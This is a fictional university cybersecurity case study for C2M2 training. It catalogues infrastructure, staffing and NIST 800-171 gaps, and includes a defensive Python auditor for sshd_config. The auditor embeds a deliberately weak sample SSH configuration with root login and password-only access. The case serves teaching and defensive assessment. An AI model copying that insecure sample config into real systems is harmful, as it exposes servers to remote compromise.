ARU — Westbrook, Pennsylvania · Fictional R1 Research University · C2M2 v2.1 Training Case Study
Allegheny Research University (ARU) is a public R1 doctoral research university in Westbrook, Pennsylvania, founded in 1887. ARU enrolls 18,400 students across seven colleges and maintains four federally funded research centers with active contracts from the Department of Energy (DOE), Department of Defense/DARPA, National Institutes of Health (NIH), and National Science Foundation (NSF). Annual research expenditure reached $185 million in FY2025, driven in large part by two high-sensitivity programs: DOE fusion energy research (Physics Department, Dr. Christine Morrow) and DOD/DARPA autonomous systems research through the Institute for Autonomous Systems (IAS). Both programs handle Controlled Unclassified Information (CUI), and IAS research is additionally subject to International Traffic in Arms Regulations (ITAR).
ARU appointed its first-ever Chief Information Security Officer (CISO), James Whitfield, in September 2024. A NIST SP 800-171 gap assessment, initiated in 2024 and completed by Granite Shield LLC in March 2025, found 47 of the 110 practices unimplemented across the institution. The assessment was triggered by a CMMC Level 2 certification requirement from ARU's DOD/DARPA contract office. Granite Shield LLC has also been engaged as the CMMC Third-Party Assessment Organization (C3PAO), and a CMMC Level 2 assessment is targeted for Q4 2026. The C3PAO's pre-assessment estimated an SPRS score of −87 on the DoD Assessment Methodology scale (110 points less a weight of 1, 3 or 5 for each unimplemented practice, floor −203), with the deductions driven primarily by failures in Access Control (AC), System and Communications Protection (SC), and Audit and Accountability (AU). One caveat for the case: under the CMMC program a C3PAO may not certify an organization it has advised, so ARU would need to confirm that Granite Shield's gap-assessment work does not disqualify it from performing the certification assessment.
ARU's most significant structural cybersecurity challenge is its decentralized IT governance model: 24 departmental IT staff across seven colleges and four research centers operate entirely independently of the Office of Information Technology (OIT). These staff manage approximately 380 research endpoints, eight recently discovered unregistered servers, and numerous lab-specific applications, none of which is subject to OIT security baselines, CrowdStrike EDR deployment, or Splunk SIEM coverage. This governance gap is the root cause of the majority of NIST 800-171 non-conformities, and resolving it is the CISO's stated top priority for FY2026.
| Attribute | Value |
|---|---|
| Legal Name | Allegheny Research University |
| Abbreviation | ARU |
| Type | Public R1 Doctoral Research University (Carnegie R1: Very High Research Activity) |
| Established | 1887 (chartered by the Commonwealth of Pennsylvania) |
| Headquarters | 1 University Plaza, Westbrook, Pennsylvania 15909 |
| Enrollment (Fall 2025) | 18,400 students (13,200 undergraduate; 5,200 graduate/doctoral) |
| FTE Employees | 3,633 (faculty: 1,140; staff: 2,493) |
| Annual Operating Budget (FY2025) | $685 million |
| Annual Research Expenditure | $185 million (FY2025) — 34% from DOD/DOE/DHS-funded contracts |
| Endowment | $2.1 billion (FY2025) |
| Colleges / Schools | 7 colleges (Arts & Sciences, Engineering, Medicine, Business, Education, Public Policy, Graduate Studies) |
| Research Centers | Institute for Autonomous Systems (IAS) · Translational Medicine Research Center (TMRC) · Center for Energy Research (CER) · Materials Innovation Center (MIC) |
| Active Federal Contracts (CUI-Generating) | 4 active: DOE fusion energy ($42M) · DOD/DARPA autonomous systems ($18M) · NIH translational medicine ($31M) · NSF materials science ($8M) |
| CUI-Scope Researchers | ~200 across 4 contracts (186 confirmed + ~14 estimated additional) |
| Primary Regulatory Frameworks | FERPA · HIPAA (limited — human subjects) · NIST SP 800-171 r2 · CMMC Level 2 (target) · ITAR (22 CFR 120–130) · EAR (15 CFR 730–774) · 2 CFR Part 200 |
| ISAC Membership | REN-ISAC (active); Internet2 peer network member |
| OIT Staff | ~30 FTE under CIO Dr. Sandra Petrov; 24 additional departmental IT staff NOT under OIT |
| Cybersecurity Staff (under CISO) | 1 Security Analyst · 1 GRC Specialist · 1 SOC Analyst · 1 Security Engineer (VACANT — 9 months) |
| Annual IT Budget (FY2025) | $9.57M (1.4% of operating budget; $2,635/employee — R1 peer avg: $3,800–$4,200) |
| Cybersecurity Sub-Budget | ~$1.2M (tools: $780K · training: $85K · compliance/audit: $335K) |
| First CISO | James Whitfield (appointed Sept 2024 — ARU's first-ever CISO; 18 months in role) |
| NIST 800-171 Gap Assessment | 47 unimplemented practices (of 110 total); completed March 2025 by Granite Shield LLC |
| CMMC Assessment Target | Q4 2026 (CMMC Level 2); C3PAO: Granite Shield LLC; estimated SPRS: −87 |
| Cyber Insurance | $5M limit; Travelers Cyber Risk (PA higher education consortium); deductible: $250K |
| Overall C2M2 Level | MIL 0–2 (mixed); most domains MIL 1; Risk Mgmt at MIL 2; Workforce Mgmt at MIL 0 |
ARU's primary IT infrastructure is anchored at Whitmore Hall (FAC-01), a 4,800-square-foot data center on the main Westbrook campus. A secondary disaster recovery site at the Drayton Technology Center (FAC-02) provides partial redundancy for core administrative systems. High-performance computing and research data storage are hosted at the Kellogg Computing Facility (FAC-04), which has its own connectivity; external research collaborators reach it over SSH (TCP/22) exposed directly to the internet. The Institute for Autonomous Systems (FAC-06) operates as a secured research laboratory with DARPA requirements mandating enhanced physical and logical access controls; implementation is incomplete. ARU also maintains four satellite offices in Pittsburgh, Philadelphia, Washington DC, and Brussels.
| Facility ID | Name | Location / Campus | Primary IT Systems | Physical Security Risk |
|---|---|---|---|---|
| FAC-01 | Whitmore Hall Data Center & OIT Offices | Main campus — Westbrook, PA | Primary servers (SRV-01, SRV-03, SRV-04, SRV-07, SRV-08, SRV-10); Splunk SIEM; Cisco core switching; domain controllers | Keycard + camera; server room shared key access with Facilities Dept; badge audit log reviewed semi-annually only |
| FAC-02 | Drayton Technology Center (DR) | South campus — Westbrook, PA | DR servers; web server (SRV-09); secondary domain controller; south campus network ops | Keycard only; no camera coverage; badge audit log not reviewed in 18 months; after-hours access unmonitored |
| FAC-03 | Armstrong Research Complex | Main campus — Research quadrant | 24 departmental IT staff; ~380 research endpoints; 8 shadow IT servers (discovered Nov 2025); lab-specific applications — no OIT systems | No OIT physical security standards; departmental badge systems not integrated with OIT; shadow servers found in unlocked lab closet |
| FAC-04 | Kellogg Computing Facility (HPC & NAS) | Research Park — 2 miles from main campus | HPC head node (SRV-05, RHEL 8); NetApp FAS2820 NAS (SRV-06, 480 TB); DOE and DOD/DARPA research computing workloads | Keycard access; no camera inside server room; badge system misconfigured since Oct 2025 — not logging all access events; CISA flagged non-compliant with DOE M 205.1-2 |
| FAC-05 | Harrington Administrative Center | Main campus — Administrative core | Presidential & Provost offices; Registrar; Financial Aid; 220 admin workstations | Best physical security; keycard + camera; restricted executive suite access; no significant gap |
| FAC-06 | Institute for Autonomous Systems (IAS) Laboratory | Research Park — adjacent to FAC-04 | IAS workstations + NAS (DARPA/ITAR scope); UAV simulation systems; ITAR-controlled design files; Dr. Liu's lab | ITAR requires visitor controls + access logs; visitor log paper-based and incomplete; foreign national access (Dr. Liu — Chinese national) not reviewed per ITAR deemed export rules; systems on VLAN 20 (not CUI enclave) |
Four satellite offices connect via Cisco AnyConnect SSL VPN with Duo MFA (staff-enforced; researcher/faculty adoption: 61% — HPC researchers specifically exempted at VP Research request).
| Office | Location | Function | Risk Note |
|---|---|---|---|
| Pittsburgh Research Office | Pittsburgh, PA (University Research Park) | Joint research programs; 14 staff; 18 workstations | Remote OIT support only; VPN-dependent; patching lag common |
| Philadelphia Research Office | Philadelphia, PA (University City Science Center) | NIH translational medicine satellite; 8 researchers; IRB data | IRB/PHI-scope work at non-OIT-monitored site; VPN use inconsistent |
| Washington DC Policy Office | Washington, DC (K Street NW) | Federal relations; 6 staff; federal contract liaison | Low tech footprint; primarily SaaS; VPN enforced |
| Brussels EU Research Office | Brussels, Belgium | EU Horizon grant coordination; 3 staff; visiting researchers | International; GDPR concerns; no dedicated IT support; foreign nationals with ARU credentials |
| Role | FTE | Reports To | Key Responsibilities | Notes |
|---|---|---|---|---|
| Chief Information Officer (CIO) | 1 | Provost / EVP | IT strategy, OIT budget, executive IT policy, vendor relationships, capital planning | Dr. Sandra Petrov; 7-year tenure; Ph.D. Computer Science; first CIO to hire a CISO |
| CISO | 1 | CIO | Security strategy, CMMC compliance, NIST 800-171 remediation, C3PAO liaison, incident response leadership | James Whitfield; ARU's first CISO (18 months); CISSP; former DoD contractor; limited authority over departmental systems |
| Security Analyst | 1 | CISO | Vulnerability scanning, alert triage, phishing investigation, policy compliance monitoring | OIT-managed systems only; Splunk + Tenable.io access; no after-hours coverage |
| GRC Specialist | 1 | CISO | NIST 800-171 assessment, CMMC documentation, policy drafting, risk register, POA&M management | Full-time CMMC remediation focus; manages evidence collection for Granite Shield C3PAO |
| SOC Analyst | 1 | CISO | Splunk SIEM monitoring, CrowdStrike alert response, incident documentation, IOC hunting | Monitors OIT systems only; no visibility into HPC (VLAN 60), NAS, or departmental systems |
| Security Engineer | 0 — VACANT | CISO | Intended: firewall tuning, VLAN segmentation, CUI enclave architecture, PAM tooling | Open 9 months; 3 candidates declined; market salary gap ~$22K vs. ARU compensation band |
| IT Operations Directors | 3 | CIO | Infrastructure (servers/network), Applications (ERP/SaaS), End-User Support (help desk/endpoints) | 3 separate directors for Infra, Apps, and Support verticals; OIT-managed systems only |
| HPC / Research Computing Manager | 1 | CIO | HPC cluster operations, job scheduler, storage, research computing user support | CISO has no formal authority over HPC security without VP Research Dr. Kirk sign-off |
| Departmental IT (24 FTE) | 24 | NOT under OIT — report to College Deans / Research Center Directors | Lab IT support, research endpoint management, lab applications, local network | Not subject to OIT security policy; no CrowdStrike; not in Splunk; manage 380+ endpoints and 8 shadow servers |
| Asset ID | Description | OS / Platform | Location | Status / Risk Notes |
|---|---|---|---|---|
| SRV-01 | Primary Domain Controller / Active Directory (FSMO roles, DNS primary, Duo RADIUS) | Windows Server 2022 | FAC-01 Whitmore Hall | Current — patching compliant; MFA via Duo RADIUS for VPN auth; replicated to SRV-02 |
| SRV-02 | Secondary Domain Controller / AD Replication / DNS secondary | Windows Server 2022 | FAC-02 Drayton Tech Center | DR site — patching compliant; failover tested Q3 2025 |
| SRV-03 | File Server — OIT-managed shared drives; policy documents; administrative files | Windows Server 2016 (mainstream support ended January 2022; extended support ends January 2027) | FAC-01 Whitmore Hall | Patch lag ~8 weeks; no DLP; CUI vs. non-CUI files not separated; upgrade budgeted FY2027 and must complete before extended support ends in January 2027 |
| SRV-04 | Application Server — middleware and integration services (Workday ↔ Banner; Kuali APIs) | Windows Server 2016 (extended support ends January 2027) | FAC-01 Whitmore Hall | Patch lag ~6 weeks; out of mainstream support since January 2022; single point of failure for integration services |
| SRV-05 | HPC Head Node — Lenovo ThinkSystem SR860 V2; manages DOE and DOD/DARPA compute jobs; SLURM scheduler | RHEL 8 (current) | FAC-04 Kellogg Computing Facility | CRITICAL — TCP/22 SSH open to 0.0.0.0/0 (internet); password auth only; NO MFA; DOE+DOD CUI; CISA Nov 2025 advisory (nation-state SSH targeting on university HPC) |
| SRV-06 | Research NAS — NetApp FAS2820, 480 TB; primary storage for all research data including CUI and public research | ONTAP 9.12 (current) | FAC-04 Kellogg Computing Facility | CRITICAL — CUI and public data commingled across shared volumes; no access control by data classification; NIST SP 800-171 3.1.1/3.1.2 (AC-3) and 3.13.4 (SC-4) non-conformity; 4 federal contract data sets on one NAS |
| SRV-07 | Splunk SIEM Server — Splunk Enterprise 9.2; security event monitoring and log aggregation | RHEL 8 (current) | FAC-01 Whitmore Hall | OIT systems only; HPC (VLAN 60), NAS (SRV-06), and departmental systems NOT ingested; forwarder not deployed on research endpoints; partial coverage is primary CMMC AU-domain failure |
| SRV-08 | Banner Integration Middleware — connects Ellucian Banner SIS (cloud) to Workday; grade submission and financial aid disbursement | Windows Server 2019 | FAC-01 Whitmore Hall | HIGH — single point of failure for $4.2M/semester financial aid disbursement; patch coordination with Banner cloud requires 12+ week lead time; ransomware on VLAN 10 could disrupt disbursements |
| SRV-09 | Public-Facing Web Server — ARU public website, event portal, research publication database | Ubuntu 22.04 LTS | FAC-02 Drayton Tech Center | Patch lag ~10 weeks; 2 unpatched CVEs (Tenable scan Nov 2025; CVSS 7.2 and 6.8); no WAF deployed; web app security testing last performed 2023 |
| SRV-10 | Backup & Recovery Server — Veeam Backup & Replication v12; OIT-managed server fleet | Windows Server 2022 | FAC-01 Whitmore Hall | Current; offsite copy to Azure Blob; restore test Q2 2025 successful; HPC/NAS and departmental systems NOT in backup scope |
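The SRV-05 finding above (password-only SSH on 0.0.0.0/0) is a configuration problem before it is a firewall problem. The following added example, written for this case study and not drawn from ARU's systems, parses an OpenSSH sshd_config the way sshd does (first occurrence of a keyword wins, keywords are case-insensitive, conditional Match blocks are set aside) and scores the effective global settings against the NIST SP 800-171 practices the SRV-05 row implicates. Both embedded configs are constructed: the weak one mirrors the SRV-05 description, the hardened one shows the publickey-plus-Duo keyboard-interactive pattern; the group names hpc-users and hpc-admins are assumptions.

```python
"""Audit an OpenSSH sshd_config against the SRV-05 class of findings.

Added example for this case study; the configs below are constructed, not ARU's.
"""
import re

# Effective defaults when a keyword is absent (OpenSSH 7.0 and later, sshd_config(5)).
SSHD_DEFAULTS = {
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "maxauthtries": "6",
    "usepam": "no",
    "authenticationmethods": "any",
}


def parse_sshd_config(text):
    """Return the effective *global* settings of an sshd_config.

    sshd applies the first occurrence of each keyword, compares keywords
    case-insensitively, and treats everything after the first Match line as
    conditional, so a Match block cannot repair an insecure global default.
    """
    settings = dict(SSHD_DEFAULTS)
    seen = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()            # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # "Keyword value" or "Keyword=value"
        keyword = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if keyword == "match":                         # conditional section: stop the global parse
            break
        if keyword not in seen:
            seen.add(keyword)
            settings[keyword] = value
    return settings


def audit_sshd_config(text):
    """Return a list of findings; an empty list means the global config passes."""
    s = parse_sshd_config(text)
    findings = []
    if s["passwordauthentication"].lower() != "no":
        findings.append("PasswordAuthentication enabled: single-factor password logon (3.5.3)")
    if s["permitrootlogin"].lower() != "no":
        findings.append(f"PermitRootLogin {s['permitrootlogin']}: root reachable over SSH (3.1.5)")
    chains = s["authenticationmethods"].split()
    # Every comma-separated chain must demand two factors, e.g. publickey,keyboard-interactive:pam
    if s["authenticationmethods"] == "any" or not all(len(c.split(",")) >= 2 for c in chains):
        findings.append("AuthenticationMethods does not require two factors on every chain (3.5.3)")
    if int(s["maxauthtries"]) > 3:
        findings.append(f"MaxAuthTries {s['maxauthtries']}: no effective limit on failed logons (3.1.8)")
    if "allowgroups" not in s and "allowusers" not in s:
        findings.append("No AllowGroups/AllowUsers: every directory account may attempt SSH (3.1.1)")
    if s["usepam"].lower() != "yes":
        findings.append("UsePAM off: pam_duo keyboard-interactive MFA cannot run")
    return findings


# Constructed sample mirroring the SRV-05 description; not the real head-node config.
WEAK_SSHD_CONFIG = """
Port 22
ListenAddress 0.0.0.0
PermitRootLogin yes
PasswordAuthentication yes
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
# A Match block for the VLAN 80 admin subnet does not change the global exposure:
Match Address 10.80.0.0/24
    PasswordAuthentication no
"""

# Constructed hardened counterpart: key plus Duo (keyboard-interactive via PAM) on every logon.
HARDENED_SSHD_CONFIG = """
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
KbdInteractiveAuthentication yes
UsePAM yes
AuthenticationMethods publickey,keyboard-interactive:pam
MaxAuthTries 3
LoginGraceTime 30
AllowGroups hpc-users hpc-admins
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        result = audit_sshd_config(cfg)
        print(f"{name}: {len(result)} finding(s)")
        for finding in result:
            print("  -", finding)
```

The hardened configuration only delivers a second factor if /etc/pam.d/sshd actually invokes pam_duo for the keyboard-interactive step, so an audit of the head node has to read the PAM stack as well as sshd_config. Restricting TCP/22 on the PA-5220 to the VPN pool and Internet2 collaborator ranges is the complementary network control; neither substitutes for the other.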
| Type | Count | OS | Managed By | Security Controls | Risk |
|---|---|---|---|---|---|
| Faculty Laptops (OIT-managed) | 804 | Windows 11 / macOS 14 | OIT | CrowdStrike Falcon + Duo + WSUS/JAMF | Patching compliant; MFA enforced; EDR deployed |
| Faculty Laptops (dept-managed) | 536 | Windows 11 / macOS / Linux (mixed) | Dept IT | None (no CrowdStrike / EDR) | No AV/EDR; not in Splunk; some disable Windows Defender for research tools; include CUI-handling researchers |
| Staff Workstations | 2,200 | Windows 11 | OIT | CrowdStrike Falcon + Duo + WSUS | OIT-managed; patching compliant; EDR deployed; FERPA-scope systems included |
| Research Lab Computers | ~380 | Mixed (incl. Windows 7/XP on instrument controllers) | Dept IT | No AV / EDR | Lab computers on VLAN 20 (unmonitored); XP/7 instrument controllers on VLAN 70 (legacy OS required by instrument vendor; no patch path); some internet-connected for software licensing |
| Graduate Student BYOD | ~4,200 | Mixed (Windows / macOS / Linux / ChromeOS) | Self (no MDM) | 802.1X network auth only | No MDM; 802.1X provides access control only; VLAN 40; risk of malware if VLAN 40 isolation fails |
| Shadow IT Servers (discovered) | 8 | Unknown (Linux assumed) | Dept IT | Unknown — OIT has no visibility | Discovered Nov 2025 in FAC-03 lab closets; OS, purpose, patch status, and data content unknown; OIT attempting inventory |
| Application | Vendor | Function | Hosting | Risk / Security Notes |
|---|---|---|---|---|
| Workday | Workday Inc. | HR, Finance, Payroll, Procurement — 3,633 employees | SaaS | SOC 2 Type II; MFA enforced (Duo SSO); no significant gap |
| Ellucian Banner 9 | Ellucian | Student Information System — 18,400 students; enrollment, grades, financial aid | Cloud (Ellucian-hosted) | FERPA scope; Ellucian SOC 2 Type II; no findings against the hosted Banner instance itself; the exposure is the SRV-08 on-prem integration middleware |
| Canvas LMS | Instructure | Learning management — 18,400 student users | SaaS | SOC 2 Type II; Duo SSO integrated; no significant gap |
| Microsoft 365 E3 | Microsoft | Email, Teams, SharePoint — all staff and faculty (commercial tenant) | Cloud (commercial M365) | NOT GCC High — outside the CMMC enclave boundary and not an approved CUI system; the commercial tenant also cannot provide the US-person-only handling that ITAR technical data requires; researchers actively using commercial Teams/OneDrive for CUI; 73 of ~200 CUI researchers have NOT migrated to GCC High |
| Microsoft 365 GCC High | Microsoft | CUI-compliant email and collaboration for DOE/DOD/DARPA researchers | Cloud (GCC High — FedRAMP High) | 6 months old; only 127 of ~200 required users migrated; enclave boundary incomplete; CUI arriving via commercial tenant daily |
| Kuali Research | Kuali Inc. | Grants management, proposal routing, federal contract compliance, sub-award management | SaaS | Contains federal contract terms and budget data; SOC 2 Type II; MFA not enforced for 34 PIs (password only); SAML-capable — gap is ARU config, not vendor |
| ARU HPC Cluster | Lenovo ThinkSystem (on-prem) | Research computing — DOE and DOD/DARPA simulations; ~200 active research users | On-prem (FAC-04) | SSH to internet (TCP/22 open); password auth only; NO MFA; DOE+DOD CUI; CISA Nov 2025 advisory; 2 PIs not enrolled in Duo after 6 months of escalation |
| AWS GovCloud | Amazon | DOE and DOD research data archival — completed federally funded research | Cloud (AWS GovCloud — FedRAMP High) | FedRAMP High; AES-256 at rest; IAM access controls; MFA enforced; no significant gap |
| Splunk SIEM | Splunk / Cisco | Security event monitoring, log aggregation, SOC analyst dashboard | On-prem (FAC-01 SRV-07) | OIT systems only; HPC, NAS, departmental systems NOT ingested; primary CMMC AU-domain failure |
| CrowdStrike Falcon | CrowdStrike | EDR — endpoint detection and response, threat hunting, vulnerability management | Cloud-managed | OIT-managed endpoints only (3,004 of 8,128, ~37%); excludes 536 dept-managed faculty laptops, ~380 research lab computers, ~4,200 BYOD devices and 8 shadow servers; ~63% of the endpoint fleet has no EDR |
Unlike commercial IT environments where system failures translate to revenue loss, failures in research university systems can: halt federally funded research (breach of contract), expose controlled technical data to unauthorized parties (ITAR/EAR violation with potential criminal liability), compromise student financial aid disbursements (FERPA and federal financial aid regulatory failure), and, in the case of biomedical research, endanger research subjects. The eight systems below carry criticality designations; seven are rated critical or high and one (Kuali Research) medium.
| System | Platform | Function | Connectivity | Criticality | Security Notes |
|---|---|---|---|---|---|
| ARU HPC Cluster | On-prem SRV-05 (RHEL 8, FAC-04) | Research computing — DOE fusion energy; DOD/DARPA autonomous systems simulations | VLAN 60 + Internet (SSH TCP/22 open to 0.0.0.0/0) | Critical — Research / CUI | SSH internet-facing; password auth only; NO MFA; DOE+DOD CUI; 2 non-compliant PIs; no IDS on VLAN 60; CISA Nov 2025 advisory |
| Research NAS (SRV-06) | NetApp FAS2820, 480 TB (FAC-04) | Research data storage — all centers; CUI and public data commingled | VLAN 60 (attached to HPC); VLAN 20 (faculty access) | Critical — CUI | CUI and public data commingled; access controls not based on data classification; NIST SP 800-171 3.1.1/3.1.2 (AC-3) and 3.13.4 (SC-4) non-conformity; 4 federal contract data sets on one NAS |
| Banner Integration Middleware | On-prem SRV-08 (Win Server 2019, FAC-01) | Connects Ellucian Banner SIS ↔ Workday; grade submissions; financial aid disbursement | VLAN 10 (admin); Banner cloud connection (HTTPS) | Critical — Academic / Financial Aid | Single point of failure; $4.2M/semester financial aid dependency; SaaS systems unaffected if SRV-08 down but disbursement workflows break; patch lag 12+ weeks |
| Microsoft 365 GCC High (CUI Enclave) | SaaS (Microsoft — FedRAMP High) | CUI-compliant email and collaboration for DOE/DOD/DARPA researchers | VLAN 30 (authorized); researchers accessing from VLAN 20 (commercial M365) | High — CMMC / CUI | Enclave boundary porous; 73 of ~200 required users NOT migrated; CUI arriving via commercial tenant daily; C3PAO cited failures in 11 of 47 unimplemented NIST 800-171 practices |
| Ellucian Banner SIS | Cloud (Ellucian-hosted) | Student records, enrollment, financial aid, grades — 18,400 students | Cloud (HTTPS); SRV-08 on-prem integration | High — FERPA | FERPA scope; Ellucian SOC 2 Type II (no findings against the hosted system); the exposure is the SRV-08 integration middleware |
| IAS Lab Systems | Workstations + NAS on VLAN 20 (dept-managed, FAC-06) | ITAR-controlled UAV and autonomous systems research — DARPA contract; design files, simulation data | VLAN 20 (general faculty — NOT CUI enclave VLAN 30) | High — ITAR / CUI | ITAR data on commercial VLAN 20; deemed export violation (Dr. Wei Liu — Chinese national with VLAN 20 access to ITAR data); should be on VLAN 30; DARPA CO notified informally; DDTC self-report not initiated |
| TMRC Systems | Workstations + IRB server on VLAN 20 (dept-managed) | NIH-funded human subjects research; PHI; IRB protocols; biomedical data | VLAN 20 (general faculty — not HIPAA-segmented) | High — HIPAA | IRB system on general faculty network; BAA not executed with one NIH data repository; PHI-scope systems not inventoried under HIPAA; risk analysis last conducted 2022 |
| Kuali Research (Grants Mgmt) | SaaS (cloud) | Proposal development, grant tracking, sub-award management | Cloud (HTTPS); Duo SSO (partially enforced) | Medium — Federal Contract Data | Federal contract terms and budget data; SOC 2 Type II; MFA not enforced for 34 PIs; Kuali SAML-capable — gap is ARU config |
ARU's network infrastructure is anchored at FAC-01 (Whitmore Hall data center) with secondary DR at FAC-02 (Drayton Technology Center). Core switching: Cisco Catalyst 9500 series (dual-chassis StackWise Virtual pair). Perimeter: Palo Alto PA-5220 NGFW with Panorama management (IPS signatures current). Internet connectivity: 10 Gbps commodity internet (Comcast Business) + Internet2 research network peering (100 Gbps) for high-speed research data transfer. Remote access: Cisco AnyConnect SSL VPN with Duo MFA (enforced for staff; researcher/faculty adoption 61%; HPC researchers exempted at VP Research request). Wireless: Cisco Catalyst 9100 APs; 802.1X for staff and OIT-managed faculty; PSK for student residential wireless; eduroam (VLAN 50) for visiting international researchers.
| VLAN | Name | Subnet | Primary Systems | Risk |
|---|---|---|---|---|
| VLAN 10 | Admin / Corporate | 10.10.0.0/20 | Staff workstations (2,200); OIT servers (SRV-01, SRV-03, SRV-04, SRV-07, SRV-08, SRV-10); Splunk SIEM; CrowdStrike-managed endpoints | Best-controlled segment; CrowdStrike deployed; Splunk ingested; MFA enforced; access reviews current |
| VLAN 20 | Faculty / Research (General) | 10.20.0.0/18 | OIT-managed faculty (804); dept-managed faculty (536); research lab computers (~380); IAS lab systems (ITAR scope); TMRC IRB server | ITAR data present (IAS); dept systems unmonitored; no CrowdStrike on dept devices; TMRC PHI not segmented; foreign national access to ITAR systems |
| VLAN 30 | CUI Enclave (CMMC) | 10.30.0.0/24 | 127 enrolled CUI researchers; GCC High-connected endpoints; CMMC-scoped systems; dedicated policy enforcement | Boundary incomplete — 73 of ~200 CUI researchers still on VLAN 20 / commercial M365; CUI arriving via commercial tenant daily; 11 NIST control failures attributed to this gap |
| VLAN 40 | Student / Residential | 10.40.0.0/18 | ~4,200 graduate student BYOD; student lab computers; residential network | BYOD; 802.1X auth only; no MDM; no EDR; isolated from VLAN 10/30 via ACL |
| VLAN 50 | eduroam (Visiting Researchers) | 172.16.50.0/22 | Visiting international researchers; conference visitors; external collaborators (eduroam credentials) | Fully isolated — no route to any ARU internal VLAN; internet-only access; acceptable posture |
| VLAN 60 | HPC / Research Computing | 10.60.0.0/24 | HPC head node (SRV-05); NetApp NAS (SRV-06); 48 compute nodes; SLURM scheduler | TCP/22 SSH open to internet (0.0.0.0/0); no IDS/IPS on segment; DOE+DOD CUI; Palo Alto SSH inspection disabled; CISA Nov 2025 advisory; nation-state targeting risk |
| VLAN 70 | IoT / Lab Instruments | 10.70.0.0/22 | Legacy lab instruments (Windows XP/7); building automation systems; smart HVAC; environmental sensors | Legacy OS (XP/7) — no patch path; building automation on same segment as instruments; some instruments require internet for vendor licensing (poorly controlled outbound rules) |
| VLAN 80 | IT Management | 10.80.0.0/24 | Server management interfaces (iDRAC/BMC); OIT admin workstations; CyberArk PAM (in deployment); network management systems | Restricted access; admin workstations only; PAM deployment in progress (CyberArk — 60% deployed); iDRAC credentials being rotated per CMMC remediation |
ARU's security posture reflects an institution in transition: OIT-managed systems have foundational controls in place (EDR, SIEM, MFA, NGFW), but coverage is incomplete — systematically excluding the highest-risk environments: the HPC cluster, the Research NAS, departmental research endpoints, and shadow IT servers. The CMMC gap assessment identified this partial-coverage pattern as the root cause of 31 of the 47 unimplemented NIST 800-171 practices. The controls below represent the state as of the Q1 2026 assessment.
| Control Domain | Tool / Solution | Coverage | Status | Key Gap |
|---|---|---|---|---|
| Perimeter Firewall / NGFW | Palo Alto PA-5220 + Panorama (FAC-01) | All inbound/outbound internet traffic; all campus VLANs | Partial | SSH inspection disabled on VLAN 60 at VP Research request — eliminates visibility into HPC internet-facing SSH sessions; IPS signatures current but ineffective on uninspected traffic |
| Endpoint Detection & Response (EDR) | CrowdStrike Falcon (cloud-managed) | OIT-managed endpoints only: 804 faculty laptops + 2,200 staff workstations = 3,004 endpoints (~37% of total 8,128) | Partial — 37% coverage | 536 dept-managed faculty laptops, ~380 research lab computers, ~4,200 student BYOD, and 8 shadow servers completely excluded; CUI-handling researchers on unmanaged devices |
| SIEM / Log Management | Splunk Enterprise 9.2 (on-prem SRV-07, FAC-01) | OIT-managed systems (VLAN 10, VLAN 80, select VLAN 20 OIT devices) | Partial | HPC cluster (SRV-05), Research NAS (SRV-06), VLAN 60, departmental systems (VLAN 20), shadow servers — NOT ingested; SOC analyst has no visibility into highest-risk environments; primary CMMC AU-domain failure |
| Multi-Factor Authentication (MFA) | Duo Security (integrated with AD; Cisco AnyConnect VPN; M365 GCC High) | All staff (2,200) — enforced; OIT-managed faculty — enforced; VPN — staff enforced; researcher/faculty VPN adoption: 61% | Partial | HPC cluster SSH exempt at VP Research request; 39% of researchers not using VPN+MFA for remote access; 34 PIs not using MFA for Kuali Research; Duo not required for eduroam (visiting researchers) |
| Vulnerability Management | Tenable.io (cloud-based; authenticated scanning) | OIT-managed servers (SRV-01 through SRV-10) and OIT endpoints | Partial | HPC (SRV-05) and NAS (SRV-06) scanning blocked — HPC Manager cites performance impact; departmental systems and shadow servers not scanned; 2 open CVEs on SRV-09 (CVSS 7.2, 6.8) unpatched 10+ weeks |
| Backup & Recovery | Veeam Backup & Replication v12 (SRV-10) + Azure Blob offsite copy | OIT-managed servers (SRV-01 through SRV-04, SRV-07 through SRV-10); offsite: Azure Blob | Partial | HPC compute nodes and SRV-06 Research NAS (480 TB CUI data) NOT backed up; departmental systems and shadow servers excluded; HPC/NAS recovery plan: none documented |
| Identity & Access Management (IAM) | Microsoft Active Directory (Windows Server 2022); Microsoft Entra Connect (formerly Azure AD Connect); Duo RADIUS | OIT-managed user accounts; all staff and OIT-managed faculty | Partial | No formal access review cycle (last conducted: 18 months ago); departmental IT staff manage their own accounts outside the OIT directory; shadow IT server accounts unknown; 12 inactive accounts identified in March 2026 review |
| Data Loss Prevention (DLP) | None deployed | No coverage | Not Deployed | CUI flowing through commercial M365 (uncontrolled); no inspection of outbound email/file transfers for CUI keywords; no USB restriction policy enforced; C3PAO cited DLP absence as contributing to 6 NIST 800-171 failures (MP-5, SC-28, SI-12) |
| Privileged Access Management (PAM) | CyberArk Privileged Access Manager (cloud-hosted; in deployment) | 60% deployed — OIT sysadmins and some server privileged accounts vaulted | In Deployment | HPC cluster privileged accounts, NAS admin accounts, departmental IT privileged accounts NOT in CyberArk; completion target: Q3 2026; Security Engineer vacancy slowing deployment |
| Email Security | Microsoft Defender for Office 365 Plan 1 (commercial M365); GCC High configured separately | Commercial M365 tenant (all staff/faculty); GCC High (127 enrolled researchers) | Partial | 73 CUI researchers still on commercial M365 — receiving and sending CUI outside the CMMC boundary; commercial Defender for Office 365 policies not tuned for the research environment; no custom anti-phishing training for research PIs |
| Physical Security | Keycard access (Honeywell Pro-Watch) at FAC-01, FAC-02, FAC-05; camera (Axis) at FAC-01, FAC-05 | Primary facilities FAC-01 and FAC-05 (best); FAC-04 compromised | Partial | FAC-04 (HPC) badge system misconfigured since Oct 2025 — not logging all entries; FAC-03 (Armstrong Research) has no OIT physical security standards; FAC-06 (IAS) visitor controls inadequate for ITAR; CISA flagged FAC-04 in Jan 2026 |
